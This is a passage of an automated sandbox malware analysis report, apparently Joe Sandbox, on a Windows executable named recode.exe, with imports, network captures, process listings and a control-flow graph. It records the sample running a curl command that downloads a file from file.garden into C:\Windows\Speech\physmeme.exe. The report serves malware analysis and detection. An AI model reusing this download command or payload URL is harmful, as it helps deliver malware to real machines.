                          api-ms-win-crt-string-l1-1-0.dllstrncpy, strncmp, strcmp
                          api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, fflush, __stdio_common_vsnprintf_s, __stdio_common_vsprintf_s, fread, fseek, __p__commode, ftell, _wfopen, _set_fmode, __stdio_common_vsscanf, __stdio_common_vsprintf, __stdio_common_vfprintf, fwrite, fclose
                          api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, free, malloc, _callnewh
                          api-ms-win-crt-utility-l1-1-0.dllqsort
                          api-ms-win-crt-math-l1-1-0.dlllog, logf, pow, powf, asin, atan2, sqrt, sinf, __setusermatherr, cosf, ceilf, acosf, sqrtf, fmodf, tanf
                          api-ms-win-crt-runtime-l1-1-0.dll__p___argv, _c_exit, _register_thread_local_exe_atexit_callback, system, _exit, _invalid_parameter_noinfo_noreturn, exit, abort, _initterm_e, __p___argc, _configure_narrow_argv, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _initialize_narrow_environment, _initialize_onexit_table, _register_onexit_function, _beginthreadex, terminate, _crt_atexit
                          api-ms-win-crt-convert-l1-1-0.dllatof
                          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale, ___lc_codepage_func
                          SHELL32.dllShellExecuteW
                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 13, 2025 13:16:08.596399069 CET49708443192.168.2.8104.21.16.1
                          Jan 13, 2025 13:16:08.596432924 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:08.596491098 CET49708443192.168.2.8104.21.16.1
                          Jan 13, 2025 13:16:08.607310057 CET49708443192.168.2.8104.21.16.1
                          Jan 13, 2025 13:16:08.607327938 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.082046032 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.082180023 CET49708443192.168.2.8104.21.16.1
                          Jan 13, 2025 13:16:09.084778070 CET49708443192.168.2.8104.21.16.1
                          Jan 13, 2025 13:16:09.084783077 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.085181952 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.088099957 CET49708443192.168.2.8104.21.16.1
                          Jan 13, 2025 13:16:09.135319948 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.194411993 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.194475889 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.194520950 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.194545984 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.194608927 CET49708443192.168.2.8104.21.16.1
                          Jan 13, 2025 13:16:09.194619894 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.194632053 CET44349708104.21.16.1192.168.2.8
                          Jan 13, 2025 13:16:09.194684029 CET49708443192.168.2.8104.21.16.1
                          Jan 13, 2025 13:16:09.206342936 CET49708443192.168.2.8104.21.16.1
                          Jan 13, 2025 13:16:09.206350088 CET44349708104.21.16.1192.168.2.8
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 13, 2025 13:16:08.577981949 CET6157753192.168.2.81.1.1.1
                          Jan 13, 2025 13:16:08.590003014 CET53615771.1.1.1192.168.2.8
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 13, 2025 13:16:08.577981949 CET192.168.2.81.1.1.10x5594Standard query (0)file.gardenA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 13, 2025 13:16:08.590003014 CET1.1.1.1192.168.2.80x5594No error (0)file.garden104.21.16.1A (IP address)IN (0x0001)false
                          Jan 13, 2025 13:16:08.590003014 CET1.1.1.1192.168.2.80x5594No error (0)file.garden104.21.32.1A (IP address)IN (0x0001)false
                          Jan 13, 2025 13:16:08.590003014 CET1.1.1.1192.168.2.80x5594No error (0)file.garden104.21.48.1A (IP address)IN (0x0001)false
                          Jan 13, 2025 13:16:08.590003014 CET1.1.1.1192.168.2.80x5594No error (0)file.garden104.21.64.1A (IP address)IN (0x0001)false
                          Jan 13, 2025 13:16:08.590003014 CET1.1.1.1192.168.2.80x5594No error (0)file.garden104.21.80.1A (IP address)IN (0x0001)false
                          Jan 13, 2025 13:16:08.590003014 CET1.1.1.1192.168.2.80x5594No error (0)file.garden104.21.96.1A (IP address)IN (0x0001)false
                          Jan 13, 2025 13:16:08.590003014 CET1.1.1.1192.168.2.80x5594No error (0)file.garden104.21.112.1A (IP address)IN (0x0001)false
                          • file.garden
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.849708104.21.16.14436776C:\Windows\System32\curl.exe
                          TimestampBytes transferredDirectionData
                          2025-01-13 12:16:09 UTC101OUTGET /ZloBYxFY2AfQRNoi/dx3d9.bin HTTP/1.1
                          Host: file.garden
                          User-Agent: curl/7.83.1
                          Accept: */*
                          2025-01-13 12:16:09 UTC550INHTTP/1.1 403 Forbidden
                          Date: Mon, 13 Jan 2025 12:16:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrC2995L8eqQMizxCZ4zq68s0auO69Ec7YcfklffCOLthFeEj0z%2FRAaZ%2FX8l2pVXO8aeGLZ5KS9wSyDpTWAF7oC0NlNDWSJSB9bWVOLoUIhR4MNFmqWEko4fKwtvDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 901550d92b5a41ba-EWR
                          2025-01-13 12:16:09 UTC819INData Raw: 31 31 64 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 11db<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2025-01-13 12:16:09 UTC1369INData Raw: 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69
                          Data Ascii: f.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cooki
                          2025-01-13 12:16:09 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e
                          Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn
                          2025-01-13 12:16:09 UTC1022INData Raw: 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62
                          Data Ascii: ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb
                          2025-01-13 12:16:09 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:07:16:07
                          Start date:13/01/2025
                          Path:C:\Users\user\Desktop\recode.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\recode.exe"
                          Imagebase:0x7ff758000000
                          File size:890'368 bytes
                          MD5 hash:0023578E24D6ED38DAF9C364137A8929
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:2
                          Start time:07:16:07
                          Start date:13/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:3
                          Start time:07:16:07
                          Start date:13/01/2025
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe
                          Imagebase:0x7ff677420000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:07:16:07
                          Start date:13/01/2025
                          Path:C:\Windows\System32\curl.exe
                          Wow64 process (32bit):false
                          Commandline:curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe
                          Imagebase:0x7ff704f50000
                          File size:530'944 bytes
                          MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:5
                          Start time:07:16:11
                          Start date:13/01/2025
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c cls
                          Imagebase:0x7ff677420000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:0.5%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0.4%
                            Total number of Nodes:226
                            Total number of Limit Nodes:3
                            execution_graph 21154 7ff758002020 21186 7ff75805fb48 ___lc_codepage_func 21154->21186 21159 7ff758002e30 27 API calls 21160 7ff7580020ec 21159->21160 21163 7ff758002136 21160->21163 21164 7ff758002122 21160->21164 21170 7ff758002130 21160->21170 21162 7ff75800219f 21165 7ff758002d20 11 API calls 21162->21165 21167 7ff758002142 memmove 21163->21167 21163->21170 21203 7ff758002f90 21164->21203 21168 7ff7580021b4 21165->21168 21169 7ff758002164 21167->21169 21167->21170 21171 7ff758002d20 11 API calls 21168->21171 21169->21170 21172 7ff75800222a _invalid_parameter_noinfo_noreturn 21169->21172 21221 7ff758002d20 21170->21221 21173 7ff7580021ce 21171->21173 21174 7ff758002201 21172->21174 21173->21174 21175 7ff758002d20 11 API calls 21173->21175 21180 7ff75800220e 21174->21180 21227 7ff758003390 21174->21227 21177 7ff7580021e7 21175->21177 21178 7ff758002d20 11 API calls 21177->21178 21178->21174 21179 7ff758002276 21183 7ff7580022bd _invalid_parameter_noinfo_noreturn 21179->21183 21184 7ff7580022c4 21179->21184 21180->21179 21182 7ff75800226f _invalid_parameter_noinfo_noreturn 21180->21182 21181 7ff75805e020 8 API calls 21185 7ff7580022d8 21181->21185 21182->21179 21183->21184 21184->21181 21187 7ff75805fb5b AreFileApisANSI 21186->21187 21188 7ff758002084 21186->21188 21187->21188 21189 7ff758002e30 21188->21189 21190 7ff758002e80 21189->21190 21191 7ff7580020b9 21189->21191 21192 7ff758002f40 21190->21192 21245 7ff75805fbb8 WideCharToMultiByte 21190->21245 21191->21159 21192->21191 21269 7ff7580018d0 21192->21269 21196 7ff758002f77 21197 7ff758002f13 21251 7ff758003500 21197->21251 21198 7ff758002eec memset 21201 7ff758002ec0 21198->21201 21202 7ff75805fbb8 4 API calls 21201->21202 21202->21192 21204 7ff7580030cd 21203->21204 21209 7ff758002fb9 21203->21209 21281 7ff7580014c0 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21204->21281 21206 7ff75800301e 21208 7ff75805e490 3 API calls 21206->21208 21207 7ff7580030d2 21211 7ff758001420 Concurrency::cancel_current_task __std_exception_copy 21207->21211 21210 7ff758003004 21208->21210 21209->21206 21209->21210 21212 7ff758003011 21209->21212 21213 7ff758003049 21209->21213 21214 7ff7580030a0 _invalid_parameter_noinfo_noreturn 21210->21214 21217 7ff758003066 memmove 21210->21217 21218 7ff7580030a7 memmove 21210->21218 21216 7ff7580030d8 21211->21216 21212->21206 21212->21207 21215 7ff75805e490 3 API calls 21213->21215 21214->21218 21215->21210 21219 7ff758003093 21217->21219 21220 7ff75800307e 21217->21220 21218->21219 21219->21170 21220->21214 21220->21219 21222 7ff758002d82 21221->21222 21225 7ff758002d43 memmove 21221->21225 21282 7ff758003690 21222->21282 21225->21162 21226 7ff758002d95 21226->21162 21228 7ff7580034e5 21227->21228 21233 7ff7580033bf 21227->21233 21302 7ff7580014c0 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21228->21302 21230 7ff758003424 21232 7ff75805e490 3 API calls 21230->21232 21231 7ff7580034ea 21237 7ff758001420 Concurrency::cancel_current_task __std_exception_copy 21231->21237 21236 7ff75800340a 21232->21236 21233->21230 21234 7ff75800344f 21233->21234 21235 7ff758003417 21233->21235 21233->21236 21239 7ff75805e490 3 API calls 21234->21239 21235->21230 21235->21231 21238 7ff7580034ae _invalid_parameter_noinfo_noreturn 21236->21238 21241 7ff7580034b5 memmove 21236->21241 21242 7ff75800346b memmove 21236->21242 21240 7ff7580034f0 21237->21240 21238->21241 21239->21236 21243 7ff7580034a1 21241->21243 21242->21243 21244 7ff75800348c 21242->21244 21243->21180 21244->21238 21244->21243 21246 7ff75805fc17 21245->21246 21247 7ff75805fc0f GetLastError 21245->21247 21248 7ff75805fc24 WideCharToMultiByte 21246->21248 21249 7ff758002ea5 21246->21249 21247->21246 21248->21249 21250 7ff75805fc52 GetLastError 21248->21250 21249->21196 21249->21197 21249->21198 21249->21201 21250->21249 21252 7ff758003677 21251->21252 21256 7ff75800352d 21251->21256 21273 7ff7580014c0 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21252->21273 21253 7ff758003597 21257 7ff75805e490 3 API calls 21253->21257 21255 7ff75800367c 21258 7ff758001420 Concurrency::cancel_current_task __std_exception_copy 21255->21258 21256->21253 21259 7ff7580035c2 21256->21259 21260 7ff75800358a 21256->21260 21261 7ff75800357d 21256->21261 21257->21261 21264 7ff758003682 21258->21264 21263 7ff75805e490 3 API calls 21259->21263 21260->21253 21260->21255 21262 7ff758003632 _invalid_parameter_noinfo_noreturn 21261->21262 21265 7ff7580035e6 memmove memset 21261->21265 21266 7ff758003639 memmove memset 21261->21266 21262->21266 21263->21261 21267 7ff758003610 21265->21267 21268 7ff758003625 21265->21268 21266->21268 21267->21262 21267->21268 21268->21201 21270 7ff7580018de 21269->21270 21274 7ff7580017e0 21270->21274 21273->21255 21275 7ff758001816 __std_exception_copy 21274->21275 21276 7ff758001865 21275->21276 21279 7ff758001895 21275->21279 21278 7ff75800188e _invalid_parameter_noinfo_noreturn 21276->21278 21276->21279 21277 7ff75805e020 8 API calls 21280 7ff7580018bb _CxxThrowException __std_exception_copy 21277->21280 21278->21279 21279->21277 21280->21196 21281->21207 21283 7ff758003813 21282->21283 21288 7ff7580036be 21282->21288 21301 7ff7580014c0 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21283->21301 21285 7ff758003728 21287 7ff75805e490 3 API calls 21285->21287 21286 7ff758003818 21292 7ff758001420 Concurrency::cancel_current_task __std_exception_copy 21286->21292 21291 7ff75800370e 21287->21291 21288->21285 21289 7ff75800371b 21288->21289 21290 7ff758003757 21288->21290 21288->21291 21289->21285 21289->21286 21294 7ff75805e490 3 API calls 21290->21294 21293 7ff7580037cc _invalid_parameter_noinfo_noreturn 21291->21293 21296 7ff7580037d3 21291->21296 21297 7ff75800377f memmove memmove 21291->21297 21295 7ff75800381e malloc 21292->21295 21293->21296 21294->21291 21299 7ff7580037db memmove 21296->21299 21298 7ff7580037aa 21297->21298 21300 7ff7580037bf 21297->21300 21298->21293 21298->21300 21299->21300 21300->21226 21301->21286 21302->21231 19034 7ff758046730 19035 7ff758046780 19034->19035 19035->19035 19055 7ff7580030e0 19035->19055 19037 7ff758046792 19038 7ff7580030e0 8 API calls 19037->19038 19039 7ff7580467c9 19038->19039 19051 7ff758046916 19039->19051 19073 7ff7580462e0 19039->19073 19042 7ff758046830 19043 7ff75804686b 19042->19043 19046 7ff758046864 _invalid_parameter_noinfo_noreturn 19042->19046 19048 7ff75804690f _invalid_parameter_noinfo_noreturn 19043->19048 19086 7ff75800d530 19043->19086 19046->19043 19048->19051 19049 7ff75805e490 3 API calls 19049->19051 19051->19049 19052 7ff7580469f9 19051->19052 19054 7ff758046a12 19051->19054 19099 7ff7580014c0 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 19051->19099 19100 7ff75805e418 AcquireSRWLockExclusive 19051->19100 19105 7ff75805e3ac AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 19051->19105 19090 7ff75805e490 19052->19090 19056 7ff758003106 19055->19056 19057 7ff7580031d0 19055->19057 19058 7ff75800310c memmove 19056->19058 19059 7ff75800312b 19056->19059 19106 7ff7580014c0 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 19057->19106 19058->19037 19061 7ff7580031d5 19059->19061 19062 7ff75800317d 19059->19062 19066 7ff75800319c 19059->19066 19069 7ff75800313c 19059->19069 19107 7ff758001420 19061->19107 19065 7ff7580031a4 memmove 19062->19065 19063 7ff75805e490 3 API calls 19067 7ff758003152 19063->19067 19065->19037 19070 7ff75805e490 3 API calls 19066->19070 19071 7ff758003157 19067->19071 19072 7ff758003195 _invalid_parameter_noinfo_noreturn 19067->19072 19068 7ff7580031db 19069->19063 19070->19071 19071->19065 19072->19066 19074 7ff7580463b8 memmove memmove 19073->19074 19075 7ff758046337 19073->19075 19074->19042 19077 7ff7580463ad 19075->19077 19080 7ff7580463f9 19075->19080 19081 7ff75804634c 19075->19081 19082 7ff758046367 19075->19082 19076 7ff75805e490 3 API calls 19079 7ff758046362 19076->19079 19078 7ff75805e490 3 API calls 19077->19078 19078->19082 19079->19082 19084 7ff7580463a6 _invalid_parameter_noinfo_noreturn 19079->19084 19083 7ff758001420 Concurrency::cancel_current_task __std_exception_copy 19080->19083 19081->19076 19082->19074 19085 7ff7580463fe 19083->19085 19084->19077 19085->19042 19087 7ff75800d56a 19086->19087 19088 7ff75800d589 19087->19088 19110 7ff75800a910 19087->19110 19088->19048 19088->19051 19091 7ff75805e4aa malloc 19090->19091 19092 7ff75805e4b4 19091->19092 19093 7ff75805e49b 19091->19093 19092->19054 19093->19091 19094 7ff75805e4ba 19093->19094 19095 7ff75805e4c5 19094->19095 19131 7ff75805eb60 19094->19131 19097 7ff758001420 Concurrency::cancel_current_task __std_exception_copy 19095->19097 19098 7ff75805e4cb 19097->19098 19098->19054 19099->19051 19101 7ff75805e42e 19100->19101 19102 7ff75805e433 ReleaseSRWLockExclusive 19101->19102 19104 7ff75805e438 SleepConditionVariableSRW 19101->19104 19104->19101 19106->19061 19108 7ff75800142e Concurrency::cancel_current_task 19107->19108 19109 7ff75800143f __std_exception_copy 19108->19109 19109->19068 19111 7ff75800aa4f 19110->19111 19114 7ff75800a949 19110->19114 19112 7ff75800aab0 19111->19112 19113 7ff75800aa76 19111->19113 19117 7ff75800aa7b 19111->19117 19120 7ff75800a997 19111->19120 19121 7ff75800e500 __stdio_common_vsprintf 19112->19121 19113->19117 19118 7ff75800aa96 19113->19118 19114->19120 19122 7ff75801f950 19114->19122 19116 7ff75800e500 __stdio_common_vsprintf 19116->19120 19117->19116 19117->19120 19126 7ff75800e500 19118->19126 19120->19088 19121->19120 19123 7ff75801f9b9 19122->19123 19124 7ff75801f965 19122->19124 19123->19120 19124->19123 19125 7ff75801f99d memmove 19124->19125 19125->19123 19130 7ff75801fbe0 19126->19130 19128 7ff75800e525 __stdio_common_vsprintf 19129 7ff75800e55a 19128->19129 19129->19120 19130->19128 19134 7ff75805eb40 19131->19134 19133 7ff75805eb6e _CxxThrowException 19133->19095 19134->19133 19135 7ff758042f17 19136 7ff758042f1c memcmp 19135->19136 19138 7ff7580430c5 19136->19138 19141 7ff75805e020 19138->19141 19142 7ff75805e029 19141->19142 19143 7ff7580430e4 19142->19143 19144 7ff75805e9f8 IsProcessorFeaturePresent 19142->19144 19145 7ff75805ea10 19144->19145 19150 7ff75805eacc RtlCaptureContext 19145->19150 19151 7ff75805eae6 RtlLookupFunctionEntry 19150->19151 19152 7ff75805eafc RtlVirtualUnwind 19151->19152 19153 7ff75805ea23 19151->19153 19152->19151 19152->19153 19154 7ff75805e9c4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19153->19154

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 7ff758002610-7ff7580026f8 call 7ff758002bc0 call 7ff758001ef0 _CxxThrowException 5 7ff758002700-7ff75800274e 0->5 5->5 6 7ff758002750-7ff75800279a system 5->6 7 7ff7580027a1-7ff7580027a8 6->7 7->7 8 7ff7580027aa-7ff7580027f4 call 7ff75805fb48 call 7ff758001bf0 call 7ff75805fc84 7->8 15 7ff7580027f6-7ff758002814 8->15 16 7ff758002840-7ff75800284a 8->16 17 7ff758002816-7ff75800281e 15->17 18 7ff758002835-7ff75800283e 15->18 19 7ff75800285d 16->19 20 7ff75800284c-7ff75800284f 16->20 21 7ff758002820-7ff758002825 17->21 22 7ff758002827-7ff75800282c 17->22 23 7ff758002862-7ff75800287c 18->23 19->23 20->19 24 7ff758002851-7ff758002854 20->24 21->23 22->18 25 7ff75800282e-7ff758002833 22->25 27 7ff7580028c2-7ff7580028c7 23->27 28 7ff75800287e-7ff758002881 23->28 24->19 26 7ff758002856-7ff75800285b 24->26 25->23 26->19 26->23 29 7ff7580028cd 27->29 30 7ff758002b18-7ff758002b57 call 7ff758002610 CreateThread 27->30 31 7ff758002884-7ff75800288c 28->31 29->31 33 7ff7580028d4-7ff7580028d6 31->33 34 7ff75800288e-7ff7580028a4 31->34 36 7ff7580028dc-7ff758002965 33->36 37 7ff758002af7-7ff758002b17 call 7ff75805e020 33->37 38 7ff7580028a6-7ff7580028b9 34->38 39 7ff7580028cf call 7ff75805df08 34->39 42 7ff758002970-7ff758002a50 36->42 38->39 40 7ff7580028bb-7ff7580028c1 _invalid_parameter_noinfo_noreturn 38->40 39->33 40->27 42->42 44 7ff758002a56-7ff758002a5a 42->44 46 7ff758002a75-7ff758002af1 ShellExecuteW 44->46 47 7ff758002a5c 44->47 46->37 48 7ff758002a61-7ff758002a73 47->48 48->46 48->48
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: ExceptionExecuteShellThrow__std_fs_code_page_invalid_parameter_noinfo_noreturnsystem
                            • String ID: $/$*-$3,$5+$<5$M[$NI$SW$VZ$Z#$\X$^B$exists$e)$go$h\ph$me.e$oc$ysme
                            • API String ID: 4003505496-3089918366
                            • Opcode ID: da34eec27d97580e87602099d6fdd4077316ac6946946a56d2b83714bfcc0ba1
                            • Instruction ID: dce82237f0453a0900d315862bd47e42d2b4bfecc77184f85dd7aab6c88ee29e
                            • Opcode Fuzzy Hash: da34eec27d97580e87602099d6fdd4077316ac6946946a56d2b83714bfcc0ba1
                            • Instruction Fuzzy Hash: F9E10772F187818BF702DF74D0012ADB771EF5A784F848325EE5836A9AEB38A149C714
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
